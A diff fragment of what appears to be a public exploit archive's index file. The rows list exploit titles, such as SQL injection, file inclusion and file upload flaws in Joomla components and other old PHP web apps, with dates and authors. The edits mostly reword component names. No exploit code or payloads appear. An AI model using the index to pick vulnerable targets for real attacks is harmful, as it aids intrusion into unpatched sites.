12349,platforms/php/webapps/12349.txt,"AJ Shopping Cart 1.0 (maincatid) - SQL Injection",2010-04-22,v3n0m,php,webapps,0
@ -23045,7 +23046,7 @@ id,file,description,date,author,platform,type,port
12428,platforms/php/webapps/12428.txt,"Joomla! Component SmartSite 1.0.0 - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
12429,platforms/php/webapps/12429.pl,"Joomla! Component ABC 1.1.7 - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0
12430,platforms/php/webapps/12430.txt,"Joomla! Component Graphics 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0
12432,platforms/php/webapps/12432.txt,"Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0
12432,platforms/php/webapps/12432.txt,"Joomla! Component com_jesectionfinder - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0
12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps,0
12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps,0
12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0
@ -23170,7 +23171,7 @@ id,file,description,date,author,platform,type,port
12611,platforms/php/webapps/12611.txt,"Joomla! Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0
12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum - 'about_us.php' SQL Injection",2010-05-15,CoBRa_21,php,webapps,0
12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 - (tiny_mce) Arbitrary File Upload",2010-05-15,ITSecTeam,php,webapps,0
12615,platforms/php/webapps/12615.txt,"Joomla! Component 'com_camp' - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0
12615,platforms/php/webapps/12615.txt,"Joomla! Component com_camp - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0
12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0
12618,platforms/php/webapps/12618.txt,"Joomla! Component simpledownload 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps,0
12619,platforms/php/webapps/12619.txt,"Cybertek CMS - Local File Inclusion",2010-05-16,XroGuE,php,webapps,0
@ -23181,13 +23182,13 @@ id,file,description,date,author,platform,type,port
12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0
12630,platforms/php/webapps/12630.txt,"I-Vision CMS - Cross-Site Scripting / SQL Injection",2010-05-16,Ariko-Security,php,webapps,0
12631,platforms/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-17,CoBRa_21,php,webapps,0
12632,platforms/php/webapps/12632.txt,"Joomla! Component 'com_crowdsource' - SQL Injection",2010-05-17,ByEge,php,webapps,0
12633,platforms/php/webapps/12633.txt,"Joomla! Component 'com_event' - Multiple Vulnerabilities",2010-05-17,ALTBTA,php,webapps,0
12632,platforms/php/webapps/12632.txt,"Joomla! Component com_crowdsource - SQL Injection",2010-05-17,ByEge,php,webapps,0
12633,platforms/php/webapps/12633.txt,"Joomla! Component com_event - Multiple Vulnerabilities",2010-05-17,ALTBTA,php,webapps,0
12634,platforms/php/webapps/12634.txt,"PHP Gamepage - SQL Injection",2010-05-17,v4lc0m87,php,webapps,0
12635,platforms/php/webapps/12635.txt,"PHP-Fusion 4.01 - SQL Injection",2010-05-17,Ma3sTr0-Dz,php,webapps,0
12636,platforms/php/webapps/12636.txt,"MidiCart PHP/ASP - Arbitrary File Upload",2010-05-17,DigitALL,php,webapps,0
12637,platforms/php/webapps/12637.txt,"MyNews 1.0 CMS - SQL Injection / Local File Inclusion / Cross-Site Scripting",2010-05-17,mr_me,php,webapps,0
12639,platforms/php/webapps/12639.txt,"Joomla! Component 'com_event' - SQL Injection",2010-05-17,anonymous,php,webapps,0
12639,platforms/php/webapps/12639.txt,"Joomla! Component com_event - SQL Injection",2010-05-17,anonymous,php,webapps,0
12640,platforms/windows/webapps/12640.txt,"Abyss Web Server X1 - Cross-Site Request Forgery",2010-05-17,"John Leitch",windows,webapps,0
12641,platforms/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection",2010-05-17,AntiSecurity,php,webapps,0
12642,platforms/php/webapps/12642.txt,"phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path",2010-05-18,cp77fk4r,php,webapps,0
@ -23196,7 +23197,7 @@ id,file,description,date,author,platform,type,port
12645,platforms/php/webapps/12645.txt,"TS Special Edition 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps,0
12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) - Arbitrary File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0
12647,platforms/php/webapps/12647.txt,"Webloader 7 < 8 - (vid) SQL Injection",2010-05-18,ByEge,php,webapps,0
12648,platforms/php/webapps/12648.txt,"Joomla! Component 'com_packages' - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0
12648,platforms/php/webapps/12648.txt,"Joomla! Component com_packages - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0
12651,platforms/php/webapps/12651.txt,"Lokomedia CMS - (sukaCMS) Local File Disclosure",2010-05-18,vir0e5,php,webapps,0
12654,platforms/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection",2010-05-18,Pokeng,php,webapps,0
12656,platforms/php/webapps/12656.txt,"Battle Scrypt - Arbitrary File Upload",2010-05-19,DigitALL,php,webapps,0
@ -23289,7 +23290,7 @@ id,file,description,date,author,platform,type,port
12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps,0
12779,platforms/php/webapps/12779.txt,"Joomla! Component My Car 1.0 - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
12780,platforms/php/webapps/12780.txt,"Joomla! Component BF Quiz 1.3.0 - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0
12781,platforms/php/webapps/12781.txt,"Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12781,platforms/php/webapps/12781.txt,"Joomla! Component JE Poll - 'pollid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12782,platforms/php/webapps/12782.txt,"Joomla! Component JE Job 1.0 - 'catid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0
12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) - SQL Injection",2010-05-29,Shamus,windows,webapps,0
@ -23323,8 +23324,8 @@ id,file,description,date,author,platform,type,port
12839,platforms/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,php,webapps,0
12840,platforms/php/webapps/12840.txt,"Delivering Digital Media CMS - SQL Injection",2010-06-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
12841,platforms/asp/webapps/12841.txt,"Ticimax E-Ticaret - SQL Injection",2010-06-01,Neuromancer,asp,webapps,0
12842,platforms/php/webapps/12842.txt,"Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
12843,platforms/php/webapps/12843.txt,"Joomla! Component 'com_chronocontact' - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
12842,platforms/php/webapps/12842.txt,"Joomla! Component ChronoConnectivity - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
12843,platforms/php/webapps/12843.txt,"Joomla! Component ChronoForms - Blind SQL Injection",2010-06-02,_mlk_,php,webapps,0
12845,platforms/php/webapps/12845.txt,"Vastal I-Tech - SQL Injection",2010-06-02,HELLBOY,php,webapps,0
12848,platforms/php/webapps/12848.txt,"SIMM Management System (SMS) - Local File Inclusion",2010-06-02,AntiSecurity,php,webapps,0
12849,platforms/php/webapps/12849.txt,"slogan design Script - SQL Injection",2010-06-03,Mr.P3rfekT,php,webapps,0
@ -23337,7 +23338,7 @@ id,file,description,date,author,platform,type,port
12861,platforms/php/webapps/12861.txt,"PHP SETI@home Web monitor - (PHPsetimon) Remote File Inclusion / Local File Inclusion",2010-06-03,eidelweiss,php,webapps,0
12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,php,webapps,0
12867,platforms/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,php,webapps,0
12868,platforms/php/webapps/12868.txt,"Joomla! Component 'com_lead' - SQL Injection",2010-06-03,ByEge,php,webapps,0
12868,platforms/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,php,webapps,0
30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 - links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0
18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
18594,platforms/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
@ -23380,21 +23381,21 @@ id,file,description,date,author,platform,type,port
14294,platforms/php/webapps/14294.txt,"sphider 1.3.5 - Remote File Inclusion",2010-07-09,Li0n-PaL,php,webapps,0
13790,platforms/asp/webapps/13790.txt,"iClone - SQL Injection",2010-06-09,Sid3^effects,asp,webapps,0
14333,platforms/php/webapps/14333.html,"Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
13792,platforms/php/webapps/13792.txt,"Joomla! Component 'com_cinema' - SQL Injection",2010-06-09,Sudden_death,php,webapps,0
13792,platforms/php/webapps/13792.txt,"Joomla! Component cinema - SQL Injection",2010-06-09,Sudden_death,php,webapps,0
13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager - SQL Injection",2010-06-09,"L0rd CrusAd3r",asp,webapps,0
13794,platforms/multiple/webapps/13794.txt,"Joomla! Component 'Jreservation' 1.5 - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,multiple,webapps,0
27972,platforms/php/webapps/27972.txt,"ESTsoft InternetDisk - Arbitrary File Upload / Script Execution",2006-06-05,Kil13r,php,webapps,0
27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 - inc/dbase.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 - inc/config.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
13796,platforms/php/webapps/13796.txt,"Joomla! Component 'com_jstore' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13797,platforms/php/webapps/13797.txt,"Joomla! Component 'com_jtickets' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13798,platforms/php/webapps/13798.txt,"Joomla! Component 'com_jcommunity' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13799,platforms/php/webapps/13799.txt,"Joomla! Component 'com_jmarket' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13800,platforms/php/webapps/13800.txt,"Joomla! Component 'com_jsubscription' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13796,platforms/php/webapps/13796.txt,"Joomla! Component com_jstore - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13797,platforms/php/webapps/13797.txt,"Joomla! Component com_jtickets - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13798,platforms/php/webapps/13798.txt,"Joomla! Component com_jcommunity - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13799,platforms/php/webapps/13799.txt,"Joomla! Component com_jmarket - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13800,platforms/php/webapps/13800.txt,"Joomla! Component com_jsubscription - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13801,platforms/php/webapps/13801.txt,"Science Fair In A Box - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps,0
13802,platforms/php/webapps/13802.txt,"PHP Real Estate Script - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0
13803,platforms/php/webapps/13803.txt,"PHPAccess - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0
13804,platforms/php/webapps/13804.txt,"Joomla! Component 'com_jnewsletter' - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13804,platforms/php/webapps/13804.txt,"Joomla! Component com_jnewsletter - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0
13805,platforms/php/webapps/13805.txt,"PHP Property Rental Script - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps,0
13807,platforms/php/webapps/13807.py,"BtiTracker 1.3.x < 1.4.x - Exploit",2010-06-09,TinKode,php,webapps,0
13810,platforms/php/webapps/13810.php,"AWCM CMS - Local File Inclusion",2010-06-10,SwEET-DeViL,php,webapps,0
@ -23461,7 +23462,7 @@ id,file,description,date,author,platform,type,port
13912,platforms/php/webapps/13912.txt,"Havij 1.10 - Persistent Cross-Site Scripting",2010-06-17,hexon,php,webapps,0
13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 - (print&sid) SQL Injection",2010-06-17,Gamoscu,php,webapps,0
13918,platforms/multiple/webapps/13918.txt,"Spring Framework - Arbitrary code Execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0
13922,platforms/php/webapps/13922.txt,"Joomla! Component 'com_joomdocs' - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0
13922,platforms/php/webapps/13922.txt,"Joomla! Component com_joomdocs - Cross-Site Scripting",2010-06-18,Sid3^effects,php,webapps,0
13923,platforms/php/webapps/13923.txt,"Joomla! Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
13925,platforms/php/webapps/13925.txt,"Joomla! Component Ozio Gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
13926,platforms/php/webapps/13926.txt,"Joomla! Component 'com_listbingo' 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0
@ -23484,8 +23485,8 @@ id,file,description,date,author,platform,type,port
13951,platforms/php/webapps/13951.txt,"Joomla! Component 'com_eportfolio' - Arbitrary File Upload",2010-06-20,Sid3^effects,php,webapps,0
13952,platforms/php/webapps/13952.txt,"Saffa Tunes CMS - 'news.php' SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0
13954,platforms/php/webapps/13954.txt,"G.CMS Generator - SQL Injection",2010-06-21,Sid3^effects,php,webapps,0
13955,platforms/php/webapps/13955.txt,"Joomla! Component 'com_community' - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,php,webapps,0
13956,platforms/php/webapps/13956.txt,"Joomla! Component 'com_jomestate' - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps,0
13955,platforms/php/webapps/13955.txt,"Joomla! Component com_community - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,php,webapps,0
13956,platforms/php/webapps/13956.txt,"Joomla! Component com_jomestate - Remote File Inclusion",2010-06-21,Sid3^effects,php,webapps,0
13957,platforms/php/webapps/13957.txt,"myUPB 2.2.6 - Multiple Vulnerabilities",2010-06-21,ALTBTA,php,webapps,0
14363,platforms/php/webapps/14363.txt,"Ad Network Script - Persistent Cross-Site Scripting",2010-07-14,Sid3^effects,php,webapps,0
14359,platforms/php/webapps/14359.html,"ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0
@ -23556,7 +23557,7 @@ id,file,description,date,author,platform,type,port
14085,platforms/php/webapps/14085.txt,"iNet Online Community - Blind SQL Injection",2010-06-28,JaMbA,php,webapps,0
14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 - 'buyupg.php' SQL Injection",2010-06-28,Dark.Man,php,webapps,0
14062,platforms/php/webapps/14062.txt,"Joomla! Component 'jeeventcalendar' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14063,platforms/php/webapps/14063.txt,"Joomla! Component 'com_jejob' - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14063,platforms/php/webapps/14063.txt,"Joomla! Component com_jejob - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14064,platforms/php/webapps/14064.txt,"Joomla! Component jesectionfinder - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0
14073,platforms/php/webapps/14073.txt,"2DayBiz Matrimonial Script - smartresult.php SQL Injection",2010-06-27,"Easy Laster",php,webapps,0
14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Arbitrary File Upload",2010-06-26,"ViRuS Qalaa",php,webapps,0
@ -23598,7 +23599,7 @@ id,file,description,date,author,platform,type,port
14149,platforms/asp/webapps/14149.txt,"Setiran CMS - Blind SQL Injection",2010-07-01,"Th3 RDX",asp,webapps,0
14151,platforms/php/webapps/14151.pl,"Oxygen2PHP 1.1.3 - 'post.php' Blind SQL Injection",2010-07-01,Dante90,php,webapps,0
14152,platforms/php/webapps/14152.pl,"Oxygen2PHP 1.1.3 - 'forumdisplay.php' Blind SQL Injection",2010-07-01,Dante90,php,webapps,0
14154,platforms/php/webapps/14154.txt,"Joomla! Component 'com_dateconverter' 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0
14154,platforms/php/webapps/14154.txt,"Joomla! Component com_dateconverter 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0
14155,platforms/asp/webapps/14155.txt,"SIDA University System - SQL Injection",2010-07-01,K053,asp,webapps,0
14209,platforms/php/webapps/14209.txt,"Joomla! Component 'Front-End Article Manager System' - Arbitrary File Upload",2010-07-04,Sid3^effects,php,webapps,0
14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller - Cross-Site Scripting",2010-07-02,Sangteamtham,php,webapps,0
@ -23632,7 +23633,7 @@ id,file,description,date,author,platform,type,port
14204,platforms/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro 2 - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14207,platforms/php/webapps/14207.txt,"Joomla! Component 'com_phocagallery' - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
14207,platforms/php/webapps/14207.txt,"Joomla! Component Phoca Gallery 2.7.3 - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
14210,platforms/php/webapps/14210.txt,"Joomla! Component Address Book - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14211,platforms/php/webapps/14211.txt,"Joomla! Component NinjaMonials - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14213,platforms/php/webapps/14213.txt,"Joomla! Component 'com_sef' - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0
@ -23648,7 +23649,7 @@ id,file,description,date,author,platform,type,port
14229,platforms/php/webapps/14229.txt,"Bs Auto_Classifieds Script - 'articlesdetails.php' SQL Injection",2010-07-05,Sid3^effects,php,webapps,0
14230,platforms/php/webapps/14230.txt,"Bs Business_Directory Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0
33410,platforms/php/webapps/33410.txt,"Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection",2009-12-16,"Justin C. Klein Keane",php,webapps,0
14232,platforms/php/webapps/14232.txt,"Joomla! Component 'com_jpodium' - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps,0
14232,platforms/php/webapps/14232.txt,"Joomla! Component JPodium 2.7.3 - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps,0
14233,platforms/php/webapps/14233.txt,"Bs Auction Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0
14237,platforms/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web Application Vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps,0
14238,platforms/php/webapps/14238.txt,"BS Auction - SQL Injection",2010-07-06,"Easy Laster",php,webapps,0
@ -23681,7 +23682,7 @@ id,file,description,date,author,platform,type,port
14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery",2010-07-09,saudi0hacker,php,webapps,0
14293,platforms/php/webapps/14293.txt,"Joomla! Component 'Minify4Joomla' - Arbitrary File Upload / Persistent Cross-Site Scripting",2010-07-09,Sid3^effects,php,webapps,0
14291,platforms/php/webapps/14291.txt,"Joomla! Component 'IXXO Cart' - SQL Injection",2010-07-09,Sid3^effects,php,webapps,0
14434,platforms/php/webapps/14434.txt,"Joomla! Component 'com_jomtube' - 'user_id' Parameter Blind SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0
14434,platforms/php/webapps/14434.txt,"Joomla! Component com_jomtube - 'user_id' Parameter Blind SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0
14312,platforms/php/webapps/14312.txt,"Joomla! Component redSHOP 1.0 - 'pid' Parameter SQL Injection",2010-07-10,v3n0m,php,webapps,0
14296,platforms/php/webapps/14296.txt,"Joomla! Component QuickFAQ 1.0.3 - Blind SQL Injection",2010-07-09,RoAd_KiLlEr,php,webapps,0
14316,platforms/php/webapps/14316.pl,"PHP-Nuke 8.0 -Web_Links Module - Blind SQL Injection",2010-07-10,yawn,php,webapps,0
@ -23689,8 +23690,8 @@ id,file,description,date,author,platform,type,port
14306,platforms/php/webapps/14306.txt,"HoloCMS 9.0.47 - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0
14308,platforms/php/webapps/14308.txt,"WordPress Plugin Firestats - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0
14310,platforms/php/webapps/14310.js,"dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80
14313,platforms/php/webapps/14313.txt,"Joomla! Component 'com_myhome' - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0
14315,platforms/php/webapps/14315.txt,"Joomla! Component 'com_mysms' - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps,0
14313,platforms/php/webapps/14313.txt,"Joomla! Component MyHome - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0
14315,platforms/php/webapps/14315.txt,"Joomla! Component MySMS - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps,0
14335,platforms/php/webapps/14335.txt,"Joomla! Component 'healthstats' - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
14318,platforms/php/webapps/14318.html,"Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0
14319,platforms/php/webapps/14319.pl,"PHP-Nuke 8.1.0.3.5b - Remote Command Execution",2010-07-10,yawn,php,webapps,0
@ -23764,7 +23765,7 @@ id,file,description,date,author,platform,type,port
14446,platforms/php/webapps/14446.txt,"PhotoPost - PHP SQL Injection",2010-07-23,Cyber-sec,php,webapps,0
14448,platforms/php/webapps/14448.txt,"Joomla! Component Golf Course Guide 0.9.6.0 - SQL Injection",2010-07-23,Valentin,php,webapps,0
14449,platforms/php/webapps/14449.txt,"Joomla! Component Huru Helpdesk - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14450,platforms/php/webapps/14450.txt,"Joomla! Component 'com_iproperty' - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14450,platforms/php/webapps/14450.txt,"Joomla! Component com_iproperty - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0
14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0
14455,platforms/php/webapps/14455.txt,"vBulletin(R) 3.8.6 - faq.php Information Disclosure",2010-07-24,H-SK33PY,php,webapps,0
@ -23773,7 +23774,7 @@ id,file,description,date,author,platform,type,port
14459,platforms/php/webapps/14459.txt,"Open Realty 2.x / 3.x - Persistent Cross-Site Scripting",2010-07-24,K053,php,webapps,0
14461,platforms/asp/webapps/14461.txt,"AKY Blog - SQL Injection",2010-07-24,v0calist,asp,webapps,0
14462,platforms/php/webapps/14462.txt,"Joomla! Component Ozio Gallery - SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps,0
14463,platforms/php/webapps/14463.txt,"Joomla! Component 'com_itarmory' - SQL Injection",2010-07-24,Craw,php,webapps,0
14463,platforms/php/webapps/14463.txt,"Joomla! Component com_itarmory - SQL Injection",2010-07-24,Craw,php,webapps,0
14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection",2010-07-24,CoBRa_21,php,webapps,0
14466,platforms/php/webapps/14466.txt,"Joomla! Component Joomdle 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0
14467,platforms/php/webapps/14467.txt,"Joomla! Component YouTube 1.5 - SQL Injection",2010-07-24,Forza-Dz,php,webapps,0
@ -23812,7 +23813,7 @@ id,file,description,date,author,platform,type,port
14563,platforms/php/webapps/14563.html,"BXR 0.6.8 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0
14564,platforms/php/webapps/14564.html,"Amethyst 0.1.5 - Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0
14565,platforms/php/webapps/14565.html,"DiamondList 0.1.6 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0
14570,platforms/php/webapps/14570.txt,"Joomla! Component 'com_neorecruit' 1.4 - SQL Injection",2010-08-07,v3n0m,php,webapps,0
14570,platforms/php/webapps/14570.txt,"Joomla! Component NeoRecruit 1.4 - SQL Injection",2010-08-07,v3n0m,php,webapps,0
14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection",2010-08-07,Silic0n,php,webapps,0
14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - Statistics.php SQL Injection",2010-08-08,garwga,php,webapps,0
14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,php,webapps,0
@ -23840,14 +23841,14 @@ id,file,description,date,author,platform,type,port
14648,platforms/php/webapps/14648.txt,"Guestbook Script PHP - Cross-Site Scripting / HTML Injection",2010-08-15,"AnTi SeCuRe",php,webapps,0
14650,platforms/php/webapps/14650.html,"Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-15,10n1z3d,php,webapps,0
14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution",2010-08-15,BlackHawk,php,webapps,0
14655,platforms/php/webapps/14655.txt,"Joomla! Component 'com_equipment' - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0
14655,platforms/php/webapps/14655.txt,"Joomla! Component com_equipment - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0
14656,platforms/php/webapps/14656.txt,"Joomla! Component 'com_jgrid' 1.0 - Local File Inclusion",2010-08-16,"Salvatore Fresta",php,webapps,0
14659,platforms/php/webapps/14659.txt,"Joomla! Component 'com_ongallery' - SQL Injection",2010-08-16,"al bayraqim",php,webapps,0
14672,platforms/php/webapps/14672.txt,"Free Simple Software 1.0 - Remote File Inclusion",2010-08-17,Dr.$audi,php,webapps,0
14684,platforms/php/webapps/14684.php,"Open-Realty 2.5.7 - Local File Disclosure",2010-08-18,"Nikola Petrov",php,webapps,0
14686,platforms/php/webapps/14686.txt,"vbbuletin 4.0.4 - Multiple Vulnerabilities",2010-08-19,mc2_s3lector,php,webapps,0
14707,platforms/php/webapps/14707.txt,"Joomla! Component 'com_Fabrik' - SQL Injection",2010-08-21,Mkr0x,php,webapps,0
14694,platforms/php/webapps/14694.txt,"Joomla! Component 'com_extcalendar' - Blind SQL Injection",2010-08-20,Lagripe-Dz,php,webapps,0
14707,platforms/php/webapps/14707.txt,"Joomla! Component Fabrik - SQL Injection",2010-08-21,Mkr0x,php,webapps,0
14694,platforms/php/webapps/14694.txt,"Joomla! Component com_extcalendar - Blind SQL Injection",2010-08-20,Lagripe-Dz,php,webapps,0
14702,platforms/php/webapps/14702.txt,"Joomla! Component 'com_zina' - SQL Injection",2010-08-21,"Th3 RDX",php,webapps,0
14703,platforms/php/webapps/14703.txt,"Joomla! Component Biblioteca 1.0 Beta - Multiple SQL Injections",2010-08-21,"Salvatore Fresta",php,webapps,0
14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script - SQL Injection",2010-08-21,"Br0wn Sug4r",asp,webapps,0
@ -24006,7 +24007,7 @@ id,file,description,date,author,platform,type,port
15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",2010-09-29,"silent vapor",php,webapps,0
15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' Parameter SQL Injection",2010-09-29,"BorN To K!LL",php,webapps,0
